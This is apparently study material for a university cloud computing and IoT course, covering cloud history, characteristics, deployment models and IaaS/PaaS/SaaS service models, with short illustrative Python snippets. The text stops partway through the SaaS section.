
MCA (Semester – III)

Course Code - MCS-227


Course Title - Cloud Computing and IoT
Credits - 4

BLOCK 1: CLOUD COMPUTING FUNDAMENTALS AND VIRTUALIZATION

Unit 1: Cloud Computing: An Introduction

Unit 2: Cloud Deployment Models, Service Models and Cloud Architecture

Unit 3: Resource Virtualization

BLOCK 2: RESOURCE PROVISIONING, LOAD BALANCING AND SECURITY

Unit 4: Resource Pooling, Sharing and Provisioning

Unit 5: Scaling

Unit 6: Load Balancing

Unit 7: Security Issues in Cloud Computing

BLOCK 3: IoT FUNDAMENTALS AND CONNECTIVITY TECHNOLOGIES

Unit 8: Internet of Things: An Introduction

Unit 9: IoT Networking and Connectivity Technologies

BLOCK 4: Application Development, Fog Computing and Case Studies

Unit 10: IoT Application Development

Unit 11: Fog Computing and Edge Computing

Unit 12: IoT Case Studies


Unit 1: Cloud Computing: An Introduction

1.1. Traditional Computing Approaches


Previously, computing power was considered costly and scarce. Today, with the emergence of
cloud computing, it is plentiful and inexpensive, causing a profound paradigm shift: a
transition from scarcity computing to abundance computing. This computing revolution
accelerates the commoditization of products, services and business models and disrupts the
current information and communications technology (ICT) industry. Cloud computing supplies
services in the same way as utilities such as water, electricity, gas and telephony. It offers
on-demand computing, storage, software and other IT services with usage-based metered
payment. Cloud computing helps re-invent and transform technological partnerships to improve
marketing, simplify and strengthen security, and increase stakeholder interest and consumer
experience while reducing costs. With cloud computing, you don't have to over-provision
resources to handle potential peak levels of business operation. Instead, you provision only
the resources you actually require, and you can scale these resources to expand or shrink
capacity instantly as business needs evolve. This computing paradigm gave rise to many forms
of distributed computing such as grid computing and cloud computing.
These vast applications required high-performance computing systems for their execution
wherein the concept of cluster computing, grid and cloud computing came into existence. Some of
the examples are:
 Numerous Scientific and engineering applications
 Modeling, simulation and analysis of complex systems like climate, galaxies, molecular
structures, nuclear explosions, etc.
 Business and Internet applications such as e-commerce and web-servers, file servers,
databases, etc.
For running these applications, the traditional approach of parallel computing was used.
However, dedicated parallel computers were very expensive and not easily extensible. Hence,
to meet users' demands, computer scientists and engineers designed cost-effective approaches
in the form of cluster, grid and cloud computing.

1.2. Evolution of Cloud Computing


Today's PCs have remarkably high computing power. In the last few years, networking
capabilities have also improved phenomenally. It is now possible to connect clusters of
workstations with latencies and bandwidths comparable to tightly coupled machines. The
concept of "clusters" started to take off in the 1990s. The term "grid computing" also
originated in the early 1990s as a metaphor for making computer power as easy to access as
an electric power grid. Grids were considered an innovative extension of distributed
computing technology. Cloud computing then developed in a remarkable way through various
phases, including grid computing, utility computing, application service provision and
Software as a Service. The overall concept of providing computing resources via a global
network, however, began in the 1960s; the history of cloud computing is the story of how we
got from there to here. That history is not very old: the first business and consumer cloud
computing websites were launched in 1999 (Salesforce.com and Google). Cloud computing is
directly connected to the development of the Internet and of corporate technology, since
cloud computing is the answer to the question of how the Internet can improve corporate
technology. Business technology has a rich and interesting background, almost as long as
businesses themselves, but the development that has influenced cloud computing most directly
begins with the emergence of computers as suppliers of real business solutions. Cloud
computing is one of today's most groundbreaking technologies; the milestones below trace its
history.
 Early Phases: the 1960s
Computer scientist John McCarthy proposed the concept of time-sharing, which allowed
multiple users of an organization to use an expensive mainframe at the same time. This idea
is described as a major contribution to the development of the Internet and a forerunner of
cloud computing.
 1969
J.C.R. Licklider, responsible for the creation of the Advanced Research Projects
Agency (ARPANET), proposed the idea of an "Intergalactic Computer Network"
or "Galactic Network" (a computer networking term similar to today’s Internet).
His vision was to connect everyone around the world and access programs and
data from anywhere.
 1970s
The concept of virtualization took shape: more than one operating system could be run in
separate environments on the same physical machine, each environment behaving like a
completely different computer (a virtual machine). Tools such as VMware later made this
capability widely available.
 1997
Prof. Ramnath Chellappa (Dallas, 1997) gave what appears to be the first known definition
of "cloud computing": a paradigm in which the boundaries of computing are determined by
economic rather than purely technical limits.
 1999
Salesforce.com was launched as the pioneer of delivering client applications through a
simple website. The firm showed that applications could be provided via the Internet by
both specialist and mainstream software companies.
 2003
The first public release of Xen appeared. Xen is a software system that enables multiple
virtual guest operating systems to run simultaneously on a single machine; such a system
is also known as a Virtual Machine Monitor (VMM) or hypervisor.
 2006
The Amazon cloud service was launched. First, its Elastic Compute Cloud (EC2) allowed
people to run their own cloud applications and access compute capacity on demand. Simple
Storage Service (S3) was then released. These services introduced the pay-as-you-go model,
which has become the standard practice for both users and the industry as a whole.
1.3. Comparison between Cluster, Grid and Cloud Computing

Characteristics
 Cluster computing: Tightly coupled systems, single system image, centralized job management and scheduling system.
 Grid computing: Loosely coupled (decentralized) systems, diversity and dynamism, distributed job management and scheduling.
 Cloud computing: Dynamic computing infrastructure, IT service-centric approach, self-service based usage model, minimally or self-managed platform, consumption-based billing.

Physical structure
 Cluster computing: A bunch of similar or identical computers is hooked up locally (in the same physical location, directly connected with very high speed connections) to operate as a single computer.
 Grid computing: The computers do not have to be in the same physical location and can be operated independently; each computer on the grid is a distinct computer.
 Cloud computing: The computers need not be in the same physical location.

Hardware
 Cluster computing: The cluster computers all have the same hardware and OS.
 Grid computing: The computers that are part of a grid can run different operating systems and have different hardware.
 Cloud computing: The memory, storage devices and network communication are managed by the operating system of the basic physical cloud units; open source software such as Linux can support the basic physical unit management and virtualization.

Resources
 Cluster computing: The whole system (all nodes) behaves like a single system, and resources are managed by a centralized resource manager.
 Grid computing: Every node is autonomous, i.e. it has its own resource manager and behaves like an independent entity.
 Cloud computing: Every node acts as an independent entity.

Applications
 Cluster computing: Educational resources, commercial sectors for industrial promotion, medical research.
 Grid computing: Predictive modeling and simulations, engineering design and automation, energy resources exploration, medical, military and basic research, visualization.
 Cloud computing: Banking, insurance, weather forecasting, space exploration, Software as a Service, Platform as a Service, Infrastructure as a Service.

Networking
 Cluster computing: Dedicated, high-end interconnection network with low latency and high bandwidth.
 Grid computing: Mostly the Internet, with high latency and low bandwidth.
 Cloud computing: Dedicated, high-end interconnection network with low latency and high bandwidth.

Scalability
 Cluster computing: In the order of hundreds of nodes.
 Grid computing: In the order of thousands of nodes.
 Cloud computing: Hundreds to thousands of nodes.
1.4. Utility Computing

Utility computing refers to a technology and business model in which a service provider offers computing
resources to IT customers and charges them according to their consumption. Examples of such IT services are
storage, computing power, and applications.
The term "utility" is borrowed from utility services such as water, telephone, electricity, and gas that are
provided by utility companies. In the same way, when a customer receives utility computing, the computing
power consumed on the shared computer network is metered and billed on the basis of that measured consumption.
Utility computing builds on virtualization, so the total amount of web storage space and computing power made
available to the user is far greater than that of a single time-sharing computer. The service is delivered
through a number of backend web servers; these may be dedicated machines, grouped into a cluster that is
created and then leased to the end user. Distributed computing is the method by which a single such computation
is carried out across multiple web servers.
In utility computing, a provider owns the storage or computing resources, and the customer is charged according
to how much of the services they use. The customer is not billed a fixed monthly amount, nor are the services
sold outright. Depending on the resources offered, utility computing may also be called Infrastructure as a
Service (IaaS) or Hardware as a Service (HaaS).
Its function is similar to that of other basic utilities. Just as an individual or a major company using
electricity does not pay a flat monthly rate but pays for the electricity actually consumed, the utility
computing customer pays only for the computing consumed.
Some companies offer a form of utility computing in which the user rents a cloud computer and uses it to run
applications, algorithms, or anything else that may need a lot of computing power, paying per second or per
hour rather than a flat fee.
Utility computing is beneficial because of its flexibility. Since you do not own the resources and are not
leasing them for long periods, it is easy to change the amount of capacity you buy. You are free to grow or
shrink the amount of service within seconds based on your business requirements, as illustrated in the sketch
below.
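To make the metered, pay-per-use idea concrete, the following short Python sketch computes a bill from measured
consumption. It is only an illustration: the resource names and per-unit rates are hypothetical, not any real
provider's price list.

# A minimal sketch of usage-based (metered) billing with assumed unit rates.
RATES = {
    "compute_hours": 0.05,      # assumed price per VM-hour
    "storage_gb_months": 0.02,  # assumed price per GB-month
}

def compute_bill(usage):
    """Return the total charge for the metered usage of each resource."""
    return sum(RATES[resource] * amount for resource, amount in usage.items())

# A customer who ran a VM for 300 hours and stored 50 GB for one month
# is billed only for that consumption: 300*0.05 + 50*0.02 = 16.0
print(compute_bill({"compute_hours": 300, "storage_gb_months": 50}))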

1.5. Characteristics of Cloud Computing

 On-demand Self Service: A consumer can request and receive access to a service offering,
without an administrator or some sort of support staff having to fulfil the request
manually.
 Broad network Access: The servers can be accessed from any location using any type of
device – anywhere access and anytime.
 Resource Pooling: Resource can be storage, memory, network bandwidth, virtual
machines, etc. which can be consumed by the cloud users. Resource Pooling means that
multiple customers are serviced from the same physical resources.
 Measured Services: Pay according to the services you use.
 Rapid Elasticity and Scalability: One of the great things about cloud computing is the ability
to quickly provision resources in the cloud as organizations need them and then release them
when they are no longer needed (see the sketch after this list).
 Easy Maintenance: Maintenance is largely handled by the provider, making the cloud easier to keep up to date.
 Security: Copies of data are kept on multiple servers, so if one server fails, the data remains safe on another.
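To illustrate rapid elasticity, the sketch below shows a simple scaling decision that grows or shrinks a fleet
of instances to keep average CPU utilization near a target. The metric values, target and fleet limits are
assumptions for illustration; real clouds expose this behaviour through their own auto-scaling services.

# A minimal sketch of an elasticity (auto-scaling) decision.
def desired_instances(current, cpu_utilization, target=0.6, min_n=1, max_n=20):
    """Move the fleet size so average CPU utilization approaches the target."""
    if cpu_utilization <= 0:
        return min_n
    proposed = round(current * cpu_utilization / target)
    return max(min_n, min(max_n, proposed))

# At 90% utilization a fleet of 4 grows to 6; at 20% it shrinks to 1.
print(desired_instances(4, 0.9))  # 6
print(desired_instances(4, 0.2))  # 1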

1.6. Benefits of Cloud Computing


 Resources accessible anywhere, anytime
 On-demand self-service
 Reduced IT cost (no need to purchase hardware, no maintenance, etc.)
 Scalability: if traffic on a website increases, we can scale up at any time and similarly scale down.
 Online development and deployment tools
 Collaboration: people sitting in different countries can work on a project together by storing their data
on the cloud
 Offers security, as data is stored at multiple locations
 Location and device independence
 Saves time: we need not update software or maintain hardware

1.7. Applications of Cloud Computing


1. Online Data Storage:

Cloud computing allows data such as files, images, audio, and video to be stored on cloud
storage. The organization need not set up physical storage systems to hold a huge volume of
business data, which is very costly nowadays. As organizations grow technologically, data
generation also grows over time, and storing it becomes a problem; cloud storage addresses
this by allowing data to be stored and accessed at any time as required.

2. Backup and Recovery:

Cloud vendors keep the stored data safe and also provide a backup facility for it. They offer
various recovery applications for retrieving lost data. In the traditional approach, backing
up data is a complex problem, and recovering lost data is difficult and sometimes impossible.
Cloud computing has made backup and recovery applications very easy: there is no fear of
running out of backup media or of losing data.

3. Big Data Analysis:

The volume of big data is so high that storing it in a traditional data management system is
impossible for an organization. Cloud computing resolves this problem by allowing
organizations to store large volumes of data in cloud storage without worrying about physical
storage. Analyzing that raw data and extracting insights or useful information from it is a
further challenge, as it requires high-quality data analytics tools. Cloud computing therefore
gives organizations a major facility for both storing and analyzing big data.

4. E-commerce Applications:
Cloud-based e-commerce allows businesses to respond quickly to emerging opportunities. Users
can react quickly to market opportunities, and traditional e-commerce operators can respond
quickly to challenges. Cloud-based e-commerce offers a new approach to doing business with
minimal cost and in the minimum time possible. Customer data, product data, and other
operational systems are managed in cloud environments.

5. Cloud Computing in Education:

Cloud computing brings a remarkable change to learning in the education sector by providing e-learning,
online distance learning platforms, and student information portals. It is a new trend in education that
provides an attractive environment for learning, teaching, and experimenting for students, faculty members,
and researchers. Everyone associated with the field can connect to their organization's cloud and access
data and information from there.

6. E-Governance Applications:

Cloud computing can support multiple activities conducted by the government. It can help the government
move from traditional ways of managing and providing services to a more advanced approach by expanding the
availability of the environment and making it more scalable and customized. It can also help the government
reduce the unnecessary cost of managing, installing, and upgrading applications, so that the money saved can
be used for public services.

7. Cloud Computing in Medical Fields:

In the medical field, cloud computing is now used for storing and accessing data, as it allows data to be
stored and accessed over the Internet without worrying about any physical setup. It facilitates easier access
to and distribution of information among medical professionals and individual patients. Similarly, with the
help of cloud computing, information from offsite buildings and treatment facilities such as labs, doctors
making emergency house calls, and ambulances can be accessed and updated remotely, instead of waiting until a
hospital computer is available.
8. Entertainment Applications:

Many people get their entertainment from the Internet, and cloud computing is the perfect platform for
reaching such a varied consumer base. Different types of entertainment industries therefore reach their target
audiences by adopting a multi-cloud strategy. Cloud-based entertainment provides various applications such as
online music and video, online games, video conferencing, and streaming services, and it can reach any device,
be it a TV, mobile phone, set-top box, or any other form. This new form of entertainment is called On-Demand
Entertainment (ODE).

1.8. Challenges of Cloud Computing


 Availability of Services
 Data Lock-In: the difficulty of shifting large volumes of data from one platform to another.
 Data Segregation: isolation of each user's data.
 Scaling Resources: sudden demand for increased resources may arise.
 Location of Data: data is stored geographically, and each country has its own rules.
 Deletion of Data: users may demand complete removal of their data.
 Recovery and Backup: how frequently and how fast a cloud system recovers from failure.
UNIT 2 CLOUD DEPLOYMENT MODELS, SERVICE
MODELS AND CLOUD ARCHITECTURE
Structure
2.0 Introduction
2.1 Objectives
2.2 Cloud Deployment Models
2.2.1 Public Cloud
2.2.2 Private Cloud
2.2.3 Community Cloud
2.2.4 Hybrid Cloud
2.3 Choosing Appropriate Deployment Model
2.3.1 Suitability of Public Cloud
2.3.2 Suitability of Private Cloud
2.3.3 Suitability of Community Cloud
2.3.4 Suitability of Hybrid Cloud
2.3.5 Comparative analysis of cloud deployment models
2.4 Service Delivery Models
2.4.1. Infrastructure As a Service (IaaS)
2.4.2. Platform As a Service(PaaS)
2.4.3. Software As a Service (SaaS)
2.4.4. Other Services (Security Management, Identity Management, Storage, Database, Back-up, etc.)
2.5 Cloud architecture
2.6 Layers and Anatomy of the Cloud
2.7 Network Connectivity in Cloud Computing
2.8 Summary
2.9 Solutions/Answers
2.10 Further Readings

2.0 INTRODUCTION
The purpose of this unit is to introduce cloud deployment models, one of the most essential topics in cloud
computing. The various ways in which a cloud computing environment may be set up, or the various ways in which
a cloud can be deployed, are referred to as deployment models. It is critical to have a basic understanding of
deployment models, since setting up a cloud is the most basic requirement before moving on to any other aspect
of cloud computing. This unit discusses the three core cloud computing service models, namely IaaS, PaaS, and
SaaS. The roles of the end user and the service provider may differ depending on the services offered and
subscribed to; accordingly, the responsibilities of the end user and service provider under IaaS, PaaS, and
SaaS are also discussed. The unit further covers the suitability, benefits, and drawbacks of the various cloud
service models, and gives a brief overview of other service models such as NaaS, STaaS, DBaaS, SECaaS, and
IDaaS. Cloud architecture is then described: it is made up of a series of components arranged in a hierarchical
order that collectively define how the cloud functions. The cloud anatomy is explained in the next section,
followed by an overview of cloud network connectivity.

2.1 OBJECTIVES
After completion of this unit, you will be able to:

• Be familiar with the different deployment models.


• Contrast and compare different service delivery models

• Give a high-level overview of the cloud architecture.

• Provide information about the cloud's layers and anatomy.

• Describe how network connection plays a part in cloud computing.

2.2 CLOUD DEPLOYMENT MODELS


Nowadays, the majority of businesses use cloud infrastructure to reduce capital investment and control
operational costs, since it provides several advantages such as lower infrastructure expenses, greater
mobility, scalability, and improved collaboration. These advantages should be weighed against the
organization's needs when choosing a deployment model. Infrastructure accessibility and ownership are the main
factors considered in cloud deployment models. A deployment model defines the way cloud services are deployed
or made available to clients, based on ownership, capacity, access and purpose. The kinds of deployments vary
according to who manages the infrastructure and where that infrastructure is located.
The four main categories of deployment models are:
 Public
 Private
 Community
 Hybrid
2.2.1 Public Cloud: The most popular and common deployment model is the public cloud. The public cloud is
accessible from anywhere in the world and is easy for the general public to use. Any organization, enterprise,
academic institution, or a combination of them may own and manage it. The entire infrastructure is located on
the cloud provider's premises. It is a pay-per-use model that provides services on demand according to
service-level agreements. An end user can buy these resources on an hourly basis and utilize them as needed.
In the public cloud, users need not maintain any infrastructure; everything is owned and operated by the
public cloud provider. Fig. 2.2.1 represents the public cloud.

Fig.2.2.1 Public Cloud

The Public cloud model has the following benefits:

 Minimal investment: This model eliminates the need for extra hardware expenditure.
 No startup costs: Users can rent computing resources on a pay-per-use basis, so there is no need to
establish infrastructure on the user side, which reduces startup costs.
 No infrastructure management required: No hardware has to be set up on the user side; everything is
operated and controlled by the service provider.
 Zero maintenance: The service provider is responsible for all maintenance work, from infrastructure to
software applications.
 Dynamic scalability: On-demand resources are provisioned dynamically as per customer requirements.

2.2.2 Private Cloud: This is a cloud environment created specifically for a single enterprise. It is also
known as an on-premise cloud. It allows access to infrastructure and services within the boundaries of an
organization or company. A private cloud is more secure than the other models. Because the private cloud is
usually owned, deployed and managed by the organization itself, the chance of data leakage is very low, and
since all users are members of the same organization, there is no risk from outsiders. In private clouds,
only authorized users have access, allowing organizations to better manage their data and security. Fig. 2.2.2
represents the private cloud.

Fig. 2.2.2 Private Cloud

The Private cloud model has the following benefits:

 Better control: The private cloud is managed by the organization's own staff.

 Data privacy: Data is accessed and managed within the boundaries of the organization.
 Security: Data is secure because only authorized users may access it.
 Customization: In contrast to a public cloud deployment, a private cloud allows resources to be customized
to meet the organization's specific needs.

2.2.3 Community Cloud: The community cloud is an extension of the private cloud in which the cloud
infrastructure is shared among multiple organizations in the same community or area, for example groups of
businesses, financial institutions and banks. The infrastructure is provided for exclusive use by a group of
users from companies with similar computing requirements. Fig. 2.2.3 represents the community cloud.

Fig. 2.2.3 Community Cloud


The Community cloud model has the following benefits:

 Cost-effective: The community cloud is cost-effective since its infrastructure cost is shared among a
number of enterprises or communities.
 Security: The community cloud is more secure than the public cloud.
 Shared resources: Infrastructure and other resources are shared with multiple organizations.
 Data sharing and collaboration: It is excellent for both data sharing and collaboration.
 Setup benefits: Customers may be able to work more efficiently as a consequence of these shared resources.
 Smaller investment: The investment in infrastructure is shared among the organizations in the community.

2.2.4 Hybrid Cloud: This is a form of integrated cloud computing: it may be a combination of private, public,
and community clouds, all integrated into a single architecture while remaining independent entities inside
the overall system. It aims to combine the benefits of both private and public clouds. The most common way to
use the hybrid cloud is to start with a private cloud and then draw on the public cloud for additional
resources. The public cloud can be used for non-critical tasks such as development and testing, while critical
tasks such as processing company data are carried out on the private cloud. Fig. 2.2.4 represents the hybrid
cloud.

Fig. 2.2.4 Hybrid Cloud

The Hybrid cloud model has the following benefits:

• Flexibility and control: Companies gain greater flexibility to create customized solutions that match
their specific requirements.
• Cost: Cost is lower than running everything in a private cloud, since users pay only for the additional
resources used from the public cloud.
• Partial security: The hybrid cloud is generally a mix of public and private clouds. Although the private
cloud portion is considered secure, the inclusion of the public cloud poses a significant chance of a
security breach. As a result, the hybrid cloud can only be described as partially secure.
2.3 CHOOSING APPROPRIATE DEPLOYMENT MODELS
Choosing an appropriate deployment model means identifying the circumstances in which a given cloud model may
be employed. It also denotes the best circumstances and environment in which each cloud model may be
implemented.

2.3.1 Suitability of Public Cloud:

The public cloud model is appropriate in the following circumstances:

 There is a high demand for resources, resulting in a large user base.


 There is a dynamic change of resources based on customer requirements.
 No physical infrastructure exists.
 A company's finances are limited.

The public cloud model is not appropriate in the following circumstances:

 It is critical to maintain a high level of security.


 Autonomy is expected by the organization.
 Reliance on a third party is not acceptable.

2.3.2 Suitability of Private Cloud:

The term suitability in terms of cloud refers to the conditions under which this cloud model is appropriate. It also
denotes the best circumstances and environment in which to use this cloud model, such as the following:

 Enterprises or businesses that demand their own cloud for personal or business purposes.
 Business organizations that have adequate financial resources, since operating and sustaining a cloud is an
expensive effort.
 Business organizations that consider data security to be important.
 Enterprises that want complete control and autonomy over cloud resources.
 Organizations with a smaller number of users.
 Organizations that already have a pre-built infrastructure and want to manage resources efficiently.
The private cloud model is not appropriate in the following circumstances:

 The organization has a very large number of users.

 Enterprises that have financial constraints.
 Organizations that do not have a pre-existing infrastructure.
 Organizations with insufficient operational staff to maintain and administer the cloud.

2.3.3 Suitability of Community Cloud:

The Community cloud is suitable for the organizations with the following concerns:

 They wish to build a private cloud but lack the financial resources to do so.

 They do not want to take complete responsibility for maintaining the cloud.
 They desire to work in collaboration with other organizations for more effective outcomes.
 They require more security than the public cloud provides.
The community cloud model is not appropriate in the following circumstances:

 Organizations that want complete control and autonomy over cloud resources.
 Organizations that do not want to collaborate with other organizations.

2.3.4 Suitability of Hybrid Cloud:

The hybrid cloud model is appropriate in the following circumstances:

 Organizations that desire a private cloud environment with public cloud scalability
 Businesses that demand greater protection compared to the public cloud.

The Hybrid cloud model is not appropriate in the following circumstances:

 Organizations that prefer security as a top priority


 Organizations that are unable to handle complex hybrid cloud infrastructures

2.3.5 Comparative analysis of cloud deployment models

Demand for in-house infrastructure
 Public: Not required.
 Private: Mandatory.
 Community: Shared among organizations.
 Hybrid: Required for the private cloud part.

Ease of use
 Public: Very easy to use.
 Private: Requires an operational IT staff.
 Community: Requires operational IT staff from multiple organizations.
 Hybrid: Complex, because it involves more than one deployment model.

Cost
 Public: Affordable and lower compared to other models.
 Private: High compared to the public cloud.
 Community: Cost is distributed among the organizations.
 Hybrid: Cheaper than the private cloud and costlier than the public cloud.

Security
 Public: Less secure than the other models.
 Private: Provides more security than the other models.
 Community: Higher than the public cloud and lower than the private cloud.
 Hybrid: Higher than the public cloud and lower than the private and community clouds.

Ownership
 Public: Cloud service provider.
 Private: Single organization.
 Community: Multiple organizations with similar concerns.
 Hybrid: Cloud service provider for the public cloud and the organization for the private cloud.

Managed by
 Public: Cloud service provider.
 Private: The organization's operational staff.
 Community: Operational staff from the multiple organizations.
 Hybrid: Cloud service provider's operational staff for the public cloud and the organization's operational
staff for the private cloud.

Scalability
 Public: Very high.
 Private: Limited.
 Community: Limited.
 Hybrid: High.
2.4 CLOUD SERVICE DELIVERY MODELS

The cloud computing model delivers services to end users from a pool of shared resources such as compute
systems, network components, storage systems, database servers and software applications on a pay-as-you-go
basis, rather than requiring users to purchase or own them. The services are delivered and operated by the
cloud provider, which reduces the end user's management effort. Cloud computing allows the delivery of a wide
range of services, categorized into three basic delivery models as follows:

 Infrastructure as a Service
 Platform as a Service
 Software as a Service

Different cloud services are aimed at different types of users, as shown in Fig. 2.4.1. For instance, the IaaS
model is aimed at infrastructure architects, whereas PaaS is aimed at software developers and SaaS is aimed at
cloud end users.

Fig. 2.4.1 Cloud Service delivery models

2.4.1 IaaS: on Demand Virtualized Infrastructure

IaaS provisions resources to its users by giving them access to fundamental computing resources such as
processing, storage, and networks, on which they can run any kind of software, including operating systems and
applications. The user has no control over the physical infrastructure, but does have control over operating
systems, storage and installed software, as well as specific networking components (for example, host
firewalls). IaaS thus refers to using a third-party provider's virtualized physical infrastructure (network,
storage, and servers) in place of one's own. Because the IT resources are housed on external servers, they may
be accessed by anybody with an Internet connection.

The IT architect or infrastructure architect is the target audience for IaaS. The infrastructure architect may
choose virtual machine instances based on their requirements, while the physical servers are managed by the
service provider. As a result, the complexity of managing the physical infrastructure is removed or hidden
from the IT architect. A typical IaaS provider might offer the following services.

 Compute: Virtual computing power and main memory are provided to end users as part of compute as a service.
 Storage: Back-end storage is provided for storing files and VM images.
 Network: Networking components such as bridges, routers and switches are provided virtually.
 Load balancers: These manage sudden spikes in infrastructure usage by balancing the load.
Pros and Cons of IaaS

IaaS is one of the most prominent cloud computing service delivery models. It provides many benefits to IT
architects.

The following are the advantages of IaaS:

1. Charging based on usage: IaaS services are provisioned to users on a pay-per-use basis, so customers pay
only for what they have actually used. This strategy avoids needless expenditure on hardware purchases.

2. Reduced cost: IaaS providers allow their customers to rent computing resources on a subscription basis
instead of investing in physical infrastructure to run their operations. IaaS eliminates the need to purchase
physical resources, lowering the total investment cost.

3. Elastic resources: IaaS provides resources according to user requirements. Resources can be scaled up and
down with the help of load balancers, which automate dynamic scaling by redirecting additional requests to
the newly provisioned resources.

4. Better resource utilization: Resource utilization is the most important factor for an IaaS provider, since
the return on investment comes from using the infrastructure resources efficiently.

5. Supports green IT: In conventional IT architecture, dedicated servers are deployed for individual business
requirements, and the large number of servers leads to high power consumption. IaaS eliminates the need for
dedicated servers, since a single infrastructure is shared among several clients; fewer servers means lower
power consumption, resulting in greener IT.

Although IaaS saves investment cost, especially for start-up companies, it has weaknesses, particularly around
security and data protection.

The following are some of the disadvantages of IaaS:

1. Security issues: IaaS provides services through virtualization technology, using hypervisors. There are
several ways in which a hypervisor can be attacked, and if a hypervisor is compromised, any of its virtual
machines can easily be attacked as well. The majority of IaaS providers are unable to ensure complete security
for virtual machines and the data stored on them.

2. Interoperability issues: IaaS service providers do not follow common standard operating procedures, so
transferring a VM from one IaaS provider to another is difficult. Customers may therefore encounter vendor
lock-in.

3. Performance issues: IaaS provides resources from distributed servers connected through a network, so
network latency is a key factor in determining the performance of the service. Due to latency issues, VM
performance may suffer from time to time.

The following are popular examples of IaaS:

 Microsoft Azure
 Rackspace
 AWS
 Google Compute Engine
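As a concrete illustration of IaaS provisioning, the sketch below launches a single virtual machine using the
AWS EC2 API via the boto3 library, as one possible provider. The AMI ID, instance type and key pair name are
placeholders and would be replaced with real values; valid AWS credentials are assumed to be configured.

# A minimal sketch of renting compute from an IaaS provider (AWS EC2 via boto3).
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",  # placeholder machine image ID
    InstanceType="t3.micro",          # small pay-per-use instance size
    MinCount=1,
    MaxCount=1,
    KeyName="my-key-pair",            # placeholder SSH key pair name
)

# The provider returns metadata describing the newly provisioned VM.
print("Launched instance:", response["Instances"][0]["InstanceId"])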
2.4.2 PaaS: Virtualized development environment

The PaaS user, typically a developer, builds applications on a virtualized development platform provided by
the PaaS provider. Users do not have control over the development platform or the underlying infrastructure
such as servers, storage, network and operating system, but they do have control over the deployed
applications and the data related to those applications.

Developers can build their applications online using the programming languages supported on the provider's
platform and deploy them using testing tools that support the same platform. PaaS users consume the services
offered by providers through the Internet. As a result, the cost of obtaining and maintaining the many tools
needed to construct an application is reduced. PaaS services include a wide range of supported programming
languages, application platforms, databases, and testing tools, and PaaS providers also offer deployment
capabilities such as load balancers.

1. Programming languages: PaaS providers support multiple programming languages in which users can develop
their own applications, for example Python, Java, Scala, PHP and Go.

2. Application platforms: PaaS providers offer a variety of application platforms on which applications can be
developed. Popular examples are Joomla, Node.js, Drupal, WordPress, Django and Rails.

3. Databases: Applications need a backend for storing data, and a database is usually associated with the
frontend application to access that data. Databases are provided by PaaS providers as part of their platforms;
prominent examples offered by PaaS vendors are Redis, MongoDB, ClearDB, Membase, PostgreSQL, and Cloudant.

4. Testing tools: Testing tools are provided by PaaS providers as part of their platforms; they are required
to test applications after development.

Pros and Cons of PaaS

The complexity of platform and underlying infrastructure maintenance is managed by PaaS provider. This allows
developers to concentrate more on the application development.
In addition, PaaS provides the following advantages:

1. App development and deployment: PaaS provides all the necessary development and testing tools in one place,
allowing you to build, test, and deploy software quickly. After the developer completes the development process,
most PaaS services automate the testing and deployment process. This is faster than conventional development
platforms in developing and deploying applications.

2. Reduces investment cost: The majority of conventional development platforms need high-end infrastructure,
which increases the investment cost of application development. Using PaaS services eliminates the requirement
for developers to purchase licensed development and testing tools; instead, PaaS lets programmers rent
everything they need to create, test and deploy their applications. The total investment cost for application
development is therefore reduced, because expensive infrastructure is not required.

3. Team collaboration: Traditional development platforms do not offer much in the way of collaborative
development. PaaS allows developers from multiple locations to collaborate on a single project. The online shared
development platform supplied by PaaS providers makes this feasible.

4. Produces scalable applications: Applications need scale-up or scale-down the resources based on their load. In
case of scale-up, companies must keep an additional server to handle the increased traffic. New start-up companies
have a tough time expanding their server infrastructure in response to rising demand. PaaS services, on the other
hand, provide built-in scalability to applications produced on the PaaS platform.
When compared to the traditional development environment, PaaS offers several advantages to developers.
On the other side, it has several disadvantages, which are listed below:

1. Vendor lock-in: Vendor lock-in is a key disadvantage of PaaS. The primary cause is a lack of standards:
PaaS providers do not adhere to any common standards for providing services. Another factor is the adoption of
proprietary technology; most PaaS companies employ proprietary technologies that are incompatible with those
offered by other PaaS providers. This vendor lock-in prevents applications from being transferred from one
provider to another.

2. Security problems: Security is a big concern with PaaS services. Many developers are hesitant to use PaaS
because their data is stored on third-party servers off site. Many PaaS providers do have their own security
mechanisms to protect user data from breaches, but the perceived safety of an on-premise deployment is not the
same as that of an off-premise deployment. When choosing a PaaS provider, developers should compare the
provider's regulatory, compliance, and security standards against their own security needs.

3. Less flexibility: PaaS limits developers' ability to create their own application stack. Most PaaS
providers give access to a wide range of programming languages, database software and testing tools, but the
user does not have control over the platform itself. Only a few providers allow developers to customize the
platform or add new programming languages to it; the majority of PaaS vendors still do not give developers
enough flexibility.

4. Dependence on an Internet connection: Developers must have an Internet connection in order to utilize PaaS
services. The majority of PaaS providers do not offer offline access, and only a very few do. With a poor
Internet connection, the usability of the PaaS platform will not meet developer expectations.

Examples of PaaS:

 Redhat Open Shift


 Google App Engine (GAE)
 Heroku
 Scalingo
 Python Anywhere
 Azure App Service
 AWS Elastic Beanstalk
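The artifact a developer hands to a PaaS platform is simply the application code; the platform supplies, runs
and scales the servers. The sketch below is a minimal web application using Flask as an example framework; the
port handling is a simplification, since each PaaS has its own way of starting the process.

# A minimal sketch of a web application that could be deployed to a PaaS platform.
from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    return "Hello from a PaaS-hosted application!"

if __name__ == "__main__":
    # Run locally with the built-in server; on a PaaS the provider's process
    # manager typically starts the app and supplies the port to listen on.
    app.run(host="0.0.0.0", port=8080)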

2.4.3 SaaS: Cloud based application

The end user has the option of using the provider's cloud-based applications. The software can be accessed
from multiple client devices using a web browser or another client interface (such as web-based e-mail). The
customer has no access to or control over the cloud infrastructure, which includes networks, servers,
operating systems, storage, software platforms, and configuration settings. This Internet-based,
no-installation kind of software is provided as a service on subscription, and these services may be accessed
from any location in the world.

SaaS applications are provided on demand through the Internet, and users access them through a web-enabled
interface without installing software on end-user machines. Users have complete control over when, how and how
often they use SaaS services. SaaS services can be accessed through a web browser on any device, including
computers, tablets and smart devices. Some SaaS services can even be accessed by a thin client, which does not
have as much storage space as a standard desktop computer and cannot run many applications; a longer lifespan,
lower power consumption and lower cost are all advantages of using such devices. A SaaS provider might offer a
variety of services, including business management services, social media services, document management
software and mail services.

1. Business services: In order to attract new customers, the majority of SaaS providers now offer a wide range
